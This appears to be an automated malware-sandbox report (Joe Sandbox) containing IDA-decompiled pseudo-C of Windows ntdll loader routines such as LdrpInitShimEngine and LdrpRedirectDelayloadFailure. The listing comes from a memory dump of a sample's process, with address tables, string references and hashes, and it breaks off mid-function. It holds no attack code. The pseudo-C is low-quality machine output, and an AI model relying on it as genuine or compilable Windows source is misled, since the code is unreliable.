                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 46%
                                                                                                                                                                            			E1D81640D(void* __ecx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				void* _v536;
                                                                                                                                                                            				void* _v548;
                                                                                                                                                                            				char _v780;
                                                                                                                                                                            				char* _v784;
                                                                                                                                                                            				char _v788;
                                                                                                                                                                            				char _v792;
                                                                                                                                                                            				intOrPtr _v804;
                                                                                                                                                                            				char _v868;
                                                                                                                                                                            				char* _v872;
                                                                                                                                                                            				short _v874;
                                                                                                                                                                            				char _v876;
                                                                                                                                                                            				void* _v880;
                                                                                                                                                                            				char _v892;
                                                                                                                                                                            				void* _v896;
                                                                                                                                                                            				void* _v900;
                                                                                                                                                                            				void* _v904;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				short _t48;
                                                                                                                                                                            				short _t49;
                                                                                                                                                                            				void* _t52;
                                                                                                                                                                            				signed char _t61;
                                                                                                                                                                            				void* _t67;
                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                            				void* _t81;
                                                                                                                                                                            				signed char _t85;
                                                                                                                                                                            				void* _t99;
                                                                                                                                                                            				void* _t100;
                                                                                                                                                                            				void* _t102;
                                                                                                                                                                            				void* _t103;
                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                            				signed int _t106;
                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                            				void* _t109;
                                                                                                                                                                            
                                                                                                                                                                            				_t108 = (_t106 & 0xfffffff8) - 0x374;
                                                                                                                                                                            				_v8 =  *0x1d91b370 ^ _t108;
                                                                                                                                                                            				_t48 = 0x16;
                                                                                                                                                                            				_v876 = _t48;
                                                                                                                                                                            				_t96 =  &_v876;
                                                                                                                                                                            				_t49 = 0x18;
                                                                                                                                                                            				_v874 = _t49;
                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                            				_v872 = L"apphelp.dll";
                                                                                                                                                                            				_v784 =  &_v780;
                                                                                                                                                                            				_v788 = 0x1000000;
                                                                                                                                                                            				_v780 = 0;
                                                                                                                                                                            				_t52 = E1D816C11( &_v788,  &_v876, _t109);
                                                                                                                                                                            				if(_t52 < 0) {
                                                                                                                                                                            					_t85 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            					__eflags = _t85 & 0x00000003;
                                                                                                                                                                            					if((_t85 & 0x00000003) == 0) {
                                                                                                                                                                            						L12:
                                                                                                                                                                            						__eflags = _t85 & 0x00000010;
                                                                                                                                                                            						L15:
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							asm("int3");
                                                                                                                                                                            						}
                                                                                                                                                                            						L6:
                                                                                                                                                                            						_t53 =  &_v780;
                                                                                                                                                                            						if( &_v780 != _v784) {
                                                                                                                                                                            							_t53 = E1D81BA80(_v784);
                                                                                                                                                                            						}
                                                                                                                                                                            						_pop(_t100);
                                                                                                                                                                            						_pop(_t102);
                                                                                                                                                                            						_pop(_t81);
                                                                                                                                                                            						return E1D864B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(_t52);
                                                                                                                                                                            					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
                                                                                                                                                                            					_push(0);
                                                                                                                                                                            					_push("LdrpInitShimEngine");
                                                                                                                                                                            					_push(0xa35);
                                                                                                                                                                            					L11:
                                                                                                                                                                            					_push("minkernel\\ntdll\\ldrinit.c");
                                                                                                                                                                            					E1D89E692();
                                                                                                                                                                            					_t85 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            					_t108 = _t108 + 0x18;
                                                                                                                                                                            					goto L12;
                                                                                                                                                                            				}
                                                                                                                                                                            				E1D83E8A6(0, 0x4001,  &_v868);
                                                                                                                                                                            				_t96 =  &_v872;
                                                                                                                                                                            				_t103 = E1D816B45( &_v792,  &_v872, 0,  &_v892);
                                                                                                                                                                            				if(_v804 != 0) {
                                                                                                                                                                            					E1D84E7E0( &_v792, _v868);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t112 = _t103;
                                                                                                                                                                            				if(_t103 < 0) {
                                                                                                                                                                            					_t61 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            					__eflags = _t61 & 0x00000003;
                                                                                                                                                                            					if((_t61 & 0x00000003) != 0) {
                                                                                                                                                                            						E1D89E692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
                                                                                                                                                                            						_t61 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            						_t108 = _t108 + 0x18;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t61 & 0x00000010;
                                                                                                                                                                            					goto L15;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
                                                                                                                                                                            					 *0x1d915d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
                                                                                                                                                                            					E1D857DF6( *((intOrPtr*)(_t108 + 0xc)));
                                                                                                                                                                            					E1D83D3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
                                                                                                                                                                            					_t67 = E1D816868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
                                                                                                                                                                            					if(_t67 < 0) {
                                                                                                                                                                            						_t85 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            						__eflags = _t85 & 0x00000003;
                                                                                                                                                                            						if((_t85 & 0x00000003) == 0) {
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(_t67);
                                                                                                                                                                            						_push("Getting the shim engine exports failed with status 0x%08lx\n");
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						_push("LdrpInitShimEngine");
                                                                                                                                                                            						_push(0xa56);
                                                                                                                                                                            						goto L11;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t104 =  *0x1d919208; // 0x0
                                                                                                                                                                            					_v872 = _t108 + 0x178;
                                                                                                                                                                            					_v876 = 0x2000000;
                                                                                                                                                                            					_t96 =  *0x7ffe0330;
                                                                                                                                                                            					_t71 =  *0x1d915b24; // 0x17b2ce0
                                                                                                                                                                            					asm("ror esi, cl");
                                                                                                                                                                            					 *0x1d9191e0( &_v876, _t71 + 0x24, _t99, 0x20);
                                                                                                                                                                            					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
                                                                                                                                                                            						E1D816565( *((intOrPtr*)(_t108 + 0x14)));
                                                                                                                                                                            						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
                                                                                                                                                                            							E1D833BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L6;
                                                                                                                                                                            				}
                                                                                                                                                                            			}









































                                                                                                                                                                            0x1d816415
                                                                                                                                                                            0x1d816422
                                                                                                                                                                            0x1d81642e
                                                                                                                                                                            0x1d81642f
                                                                                                                                                                            0x1d816434
                                                                                                                                                                            0x1d81643a
                                                                                                                                                                            0x1d81643b
                                                                                                                                                                            0x1d816440
                                                                                                                                                                            0x1d816446
                                                                                                                                                                            0x1d81644e
                                                                                                                                                                            0x1d816458
                                                                                                                                                                            0x1d816460
                                                                                                                                                                            0x1d816465
                                                                                                                                                                            0x1d81646c
                                                                                                                                                                            0x1d879770
                                                                                                                                                                            0x1d879776
                                                                                                                                                                            0x1d879779
                                                                                                                                                                            0x1d8797b3
                                                                                                                                                                            0x1d8797b3
                                                                                                                                                                            0x1d8797dd
                                                                                                                                                                            0x1d8797dd
                                                                                                                                                                            0x1d8797e3
                                                                                                                                                                            0x1d8797e3
                                                                                                                                                                            0x1d816542
                                                                                                                                                                            0x1d816542
                                                                                                                                                                            0x1d81654a
                                                                                                                                                                            0x1d87982b
                                                                                                                                                                            0x1d87982b
                                                                                                                                                                            0x1d816557
                                                                                                                                                                            0x1d816558
                                                                                                                                                                            0x1d816559
                                                                                                                                                                            0x1d816564
                                                                                                                                                                            0x1d816564
                                                                                                                                                                            0x1d87977b
                                                                                                                                                                            0x1d87977c
                                                                                                                                                                            0x1d879781
                                                                                                                                                                            0x1d879783
                                                                                                                                                                            0x1d879788
                                                                                                                                                                            0x1d8797a0
                                                                                                                                                                            0x1d8797a0
                                                                                                                                                                            0x1d8797a5
                                                                                                                                                                            0x1d8797aa
                                                                                                                                                                            0x1d8797b0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8797b0
                                                                                                                                                                            0x1d81647e
                                                                                                                                                                            0x1d81648b
                                                                                                                                                                            0x1d816498
                                                                                                                                                                            0x1d81649e
                                                                                                                                                                            0x1d8797ed
                                                                                                                                                                            0x1d8797ed
                                                                                                                                                                            0x1d8164a4
                                                                                                                                                                            0x1d8164a6
                                                                                                                                                                            0x1d8797f7
                                                                                                                                                                            0x1d8797fc
                                                                                                                                                                            0x1d8797fe
                                                                                                                                                                            0x1d8797ce
                                                                                                                                                                            0x1d8797d3
                                                                                                                                                                            0x1d8797d8
                                                                                                                                                                            0x1d8797d8
                                                                                                                                                                            0x1d8797db
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8164ac
                                                                                                                                                                            0x1d8164b0
                                                                                                                                                                            0x1d8164be
                                                                                                                                                                            0x1d8164c3
                                                                                                                                                                            0x1d8164cc
                                                                                                                                                                            0x1d8164d1
                                                                                                                                                                            0x1d8164d8
                                                                                                                                                                            0x1d879802
                                                                                                                                                                            0x1d879808
                                                                                                                                                                            0x1d87980b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87978f
                                                                                                                                                                            0x1d879790
                                                                                                                                                                            0x1d879795
                                                                                                                                                                            0x1d879796
                                                                                                                                                                            0x1d87979b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d87979b
                                                                                                                                                                            0x1d8164de
                                                                                                                                                                            0x1d8164eb
                                                                                                                                                                            0x1d8164f1
                                                                                                                                                                            0x1d8164f9
                                                                                                                                                                            0x1d816507
                                                                                                                                                                            0x1d816510
                                                                                                                                                                            0x1d81651c
                                                                                                                                                                            0x1d816526
                                                                                                                                                                            0x1d81652c
                                                                                                                                                                            0x1d81653c
                                                                                                                                                                            0x1d87981d
                                                                                                                                                                            0x1d87981d
                                                                                                                                                                            0x1d81653c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d816526

                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlDebugPrintTimes.NTDLL ref: 1D81651C
                                                                                                                                                                              • Part of subcall function 1D816565: RtlDebugPrintTimes.NTDLL ref: 1D816614
                                                                                                                                                                              • Part of subcall function 1D816565: RtlDebugPrintTimes.NTDLL ref: 1D81665F
                                                                                                                                                                            Strings
                                                                                                                                                                            • LdrpInitShimEngine, xrefs: 1D879783, 1D879796, 1D8797BF
                                                                                                                                                                            • apphelp.dll, xrefs: 1D816446
                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 1D8797A0, 1D8797C9
                                                                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1D87977C
                                                                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1D8797B9
                                                                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1D879790
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 3446177414-204845295
                                                                                                                                                                            • Opcode ID: fd735f565590fc825423b1de7ad5c763c6118344c7adbcf4c5905db426b71699
                                                                                                                                                                            • Instruction ID: 3cc6de9d3fda238f451ef20bc65b374779253fe662bb88a7919de4bc8106acbd
                                                                                                                                                                            • Opcode Fuzzy Hash: fd735f565590fc825423b1de7ad5c763c6118344c7adbcf4c5905db426b71699
                                                                                                                                                                            • Instruction Fuzzy Hash: 39518EB56083059FD315DF28CC91BAA77E8FF84798F014919F5A59B2A1EA30E904CB93
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 17%
                                                                                                                                                                            			E1D89FA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                            				char* _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				char* _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				char* _v36;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                            				char _v56;
                                                                                                                                                                            				signed char _t50;
                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                            				char* _t71;
                                                                                                                                                                            				void* _t74;
                                                                                                                                                                            				intOrPtr* _t75;
                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                            				char* _t77;
                                                                                                                                                                            
                                                                                                                                                                            				_t74 = __edx;
                                                                                                                                                                            				_v20 = __ecx;
                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                            				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                            				E1D89F899(__ecx, _a4, _a16,  &_v16,  &_v8);
                                                                                                                                                                            				_t50 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            				_t77 = _v16;
                                                                                                                                                                            				if((_t50 & 0x00000003) != 0) {
                                                                                                                                                                            					_t71 = _t77;
                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                            						_t71 = "Unknown";
                                                                                                                                                                            					}
                                                                                                                                                                            					_push(_a20);
                                                                                                                                                                            					_push(_v20 + 0x2c);
                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                            					_push(_t71);
                                                                                                                                                                            					E1D89E692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
                                                                                                                                                                            					_t50 =  *0x1d9137c0; // 0x0
                                                                                                                                                                            				}
                                                                                                                                                                            				if((_t50 & 0x00000010) != 0) {
                                                                                                                                                                            					asm("int3");
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t74 == 0) {
                                                                                                                                                                            					_t68 = _t66;
                                                                                                                                                                            					goto L11;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t68 =  *((intOrPtr*)(_t74 + 0x18));
                                                                                                                                                                            					if(( *0x1d91391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
                                                                                                                                                                            						L11:
                                                                                                                                                                            						_t51 = 1;
                                                                                                                                                                            						goto L12;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t51 = _t66;
                                                                                                                                                                            						L12:
                                                                                                                                                                            						_t75 = _a8;
                                                                                                                                                                            						if(_t75 == 0 || _t51 == 0) {
                                                                                                                                                                            							L18:
                                                                                                                                                                            							_t76 = _a12;
                                                                                                                                                                            							if(_t76 != 0) {
                                                                                                                                                                            								if(_t77 == 0) {
                                                                                                                                                                            									_t77 = _v8;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *0x1d9191e0(_v12, _t77);
                                                                                                                                                                            								_t66 =  *_t76();
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L22;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_v52 = _a4;
                                                                                                                                                                            							_v48 = _a16;
                                                                                                                                                                            							_v28 = _t66;
                                                                                                                                                                            							_v56 = 0x24;
                                                                                                                                                                            							_v44 = _v12;
                                                                                                                                                                            							_v32 = _t68;
                                                                                                                                                                            							_v24 = E1D856010(_a20);
                                                                                                                                                                            							if(_t77 == 0) {
                                                                                                                                                                            								_v40 = _t66;
                                                                                                                                                                            								_v36 = _v8;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v40 = 1;
                                                                                                                                                                            								_v36 = _t77;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *0x1d9191e0(4,  &_v56);
                                                                                                                                                                            							_t66 =  *_t75();
                                                                                                                                                                            							if(_t66 != 0) {
                                                                                                                                                                            								L22:
                                                                                                                                                                            								return _t66;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L18;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}

























                                                                                                                                                                            0x1d89fa10
                                                                                                                                                                            0x1d89fa12
                                                                                                                                                                            0x1d89fa18
                                                                                                                                                                            0x1d89fa1d
                                                                                                                                                                            0x1d89fa2b
                                                                                                                                                                            0x1d89fa30
                                                                                                                                                                            0x1d89fa35
                                                                                                                                                                            0x1d89fa3a
                                                                                                                                                                            0x1d89fa3c
                                                                                                                                                                            0x1d89fa40
                                                                                                                                                                            0x1d89fa42
                                                                                                                                                                            0x1d89fa42
                                                                                                                                                                            0x1d89fa47
                                                                                                                                                                            0x1d89fa50
                                                                                                                                                                            0x1d89fa51
                                                                                                                                                                            0x1d89fa54
                                                                                                                                                                            0x1d89fa6d
                                                                                                                                                                            0x1d89fa72
                                                                                                                                                                            0x1d89fa77
                                                                                                                                                                            0x1d89fa7c
                                                                                                                                                                            0x1d89fa7e
                                                                                                                                                                            0x1d89fa7e
                                                                                                                                                                            0x1d89fa81
                                                                                                                                                                            0x1d89fa99
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d89fa83
                                                                                                                                                                            0x1d89fa8a
                                                                                                                                                                            0x1d89fa8d
                                                                                                                                                                            0x1d89fa9b
                                                                                                                                                                            0x1d89fa9b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d89fa95
                                                                                                                                                                            0x1d89fa95
                                                                                                                                                                            0x1d89fa9d
                                                                                                                                                                            0x1d89fa9d
                                                                                                                                                                            0x1d89faa2
                                                                                                                                                                            0x1d89fb01
                                                                                                                                                                            0x1d89fb01
                                                                                                                                                                            0x1d89fb06
                                                                                                                                                                            0x1d89fb0a
                                                                                                                                                                            0x1d89fb0c
                                                                                                                                                                            0x1d89fb0c
                                                                                                                                                                            0x1d89fb15
                                                                                                                                                                            0x1d89fb1d
                                                                                                                                                                            0x1d89fb1d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d89faa8
                                                                                                                                                                            0x1d89faae
                                                                                                                                                                            0x1d89fab4
                                                                                                                                                                            0x1d89faba
                                                                                                                                                                            0x1d89fabd
                                                                                                                                                                            0x1d89fac4
                                                                                                                                                                            0x1d89fac7
                                                                                                                                                                            0x1d89facf
                                                                                                                                                                            0x1d89fad4
                                                                                                                                                                            0x1d89fae5
                                                                                                                                                                            0x1d89fae8
                                                                                                                                                                            0x1d89fad6
                                                                                                                                                                            0x1d89fad6
                                                                                                                                                                            0x1d89fadd
                                                                                                                                                                            0x1d89fadd
                                                                                                                                                                            0x1d89faf3
                                                                                                                                                                            0x1d89fafb
                                                                                                                                                                            0x1d89faff
                                                                                                                                                                            0x1d89fb21
                                                                                                                                                                            0x1d89fb25
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d89faff
                                                                                                                                                                            0x1d89faa2
                                                                                                                                                                            0x1d89fa8d

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                            • API String ID: 3446177414-4227709934
                                                                                                                                                                            • Opcode ID: 1474e13d10880117dc008e11a4ce41ff2c3dcc545070535630a277a31aaf5f8b
                                                                                                                                                                            • Instruction ID: 389951d80596d3c3153e4f66a2cd5ee19f74edbaae5d722e27c458c88a2af441
                                                                                                                                                                            • Opcode Fuzzy Hash: 1474e13d10880117dc008e11a4ce41ff2c3dcc545070535630a277a31aaf5f8b
                                                                                                                                                                            • Instruction Fuzzy Hash: C8416EB6A00219ABCB09CF99C980AEEBBF5FF88354F114119F995A7340D731AE41CB91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                            			E1D829046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				short _t95;
                                                                                                                                                                            				intOrPtr _t110;
                                                                                                                                                                            				short _t118;
                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                            				intOrPtr _t136;
                                                                                                                                                                            				intOrPtr _t140;
                                                                                                                                                                            				intOrPtr _t146;
                                                                                                                                                                            				intOrPtr* _t148;
                                                                                                                                                                            				intOrPtr _t151;
                                                                                                                                                                            				intOrPtr _t152;
                                                                                                                                                                            				intOrPtr* _t154;
                                                                                                                                                                            				void* _t156;
                                                                                                                                                                            
                                                                                                                                                                            				_t141 = __edx;
                                                                                                                                                                            				_push(0x154);
                                                                                                                                                                            				_push(0x1d8fbe98);
                                                                                                                                                                            				E1D877C40(__ebx, __edi, __esi);
                                                                                                                                                                            				 *(_t156 - 0xf0) = __edx;
                                                                                                                                                                            				_t151 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
                                                                                                                                                                            				 *((short*)(_t156 - 0xda)) = 0;
                                                                                                                                                                            				 *(_t156 - 0xe0) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
                                                                                                                                                                            				E1D868F40(_t156 - 0x13c, 0, 0x3c);
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0x160)) = 1;
                                                                                                                                                                            				_t131 = 7;
                                                                                                                                                                            				memset(_t156 - 0x15c, 0, _t131 << 2);
                                                                                                                                                                            				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
                                                                                                                                                                            				_t152 = E1D839870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                                                                                                                                                            				if(_t152 >= 0) {
                                                                                                                                                                            					if( *0x1d9165e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t152 = E1D83A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
                                                                                                                                                                            						if(_t152 < 0) {
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
                                                                                                                                                                            							L11:
                                                                                                                                                                            							_t152 = 0xc0150005;
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
                                                                                                                                                                            							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
                                                                                                                                                                            								 *(_t156 - 0x120) = 0xfffffffc;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t136 =  *((intOrPtr*)(_t156 - 0x114));
                                                                                                                                                                            						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
                                                                                                                                                                            						 *((short*)(_t156 - 0xda)) = _t95;
                                                                                                                                                                            						 *((short*)(_t156 - 0xdc)) = _t95;
                                                                                                                                                                            						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                                                                                                                                                            						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
                                                                                                                                                                            						 *((short*)(_t156 - 0xea)) = 0xaa;
                                                                                                                                                                            						_t152 = E1D845A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
                                                                                                                                                                            						if(_t152 < 0 || E1D8404C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t154 =  *0x1d9165e0; // 0x7681a680
                                                                                                                                                                            							 *0x1d9191e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
                                                                                                                                                                            							_t152 =  *_t154();
                                                                                                                                                                            							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                            							if(_t152 < 0) {
                                                                                                                                                                            								goto L1;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
                                                                                                                                                                            								if(_t110 == 0xffffffff) {
                                                                                                                                                                            									L26:
                                                                                                                                                                            									 *((intOrPtr*)(_t156 - 4)) = 1;
                                                                                                                                                                            									_t148 =  *0x1d9165e8; // 0x75767740
                                                                                                                                                                            									if(_t148 != 0) {
                                                                                                                                                                            										 *0x1d9191e0(_t110);
                                                                                                                                                                            										 *_t148();
                                                                                                                                                                            									}
                                                                                                                                                                            									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                                                                                                                                                            									goto L1;
                                                                                                                                                                            								}
                                                                                                                                                                            								E1D83DC40(_t156 - 0x164, _t110);
                                                                                                                                                                            								 *((intOrPtr*)(_t156 - 4)) = 0;
                                                                                                                                                                            								if( *((intOrPtr*)(_t146 + 4)) != 0) {
                                                                                                                                                                            									E1D833B90(_t146);
                                                                                                                                                                            								}
                                                                                                                                                                            								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
                                                                                                                                                                            								_t152 = E1D839870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                                                                                                                                                            								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                            								if(_t152 < 0) {
                                                                                                                                                                            									L25:
                                                                                                                                                                            									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                                                                                                                                                            									_t110 = E1D88247B();
                                                                                                                                                                            									goto L26;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t152 = E1D83A170(7, 0, 2, _t149, _t156 - 0x140);
                                                                                                                                                                            									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                            									if(_t152 < 0) {
                                                                                                                                                                            										goto L25;
                                                                                                                                                                            									}
                                                                                                                                                                            									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
                                                                                                                                                                            										_t140 =  *((intOrPtr*)(_t156 - 0x114));
                                                                                                                                                                            										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
                                                                                                                                                                            										 *((short*)(_t156 - 0xda)) = _t118;
                                                                                                                                                                            										 *((short*)(_t156 - 0xdc)) = _t118;
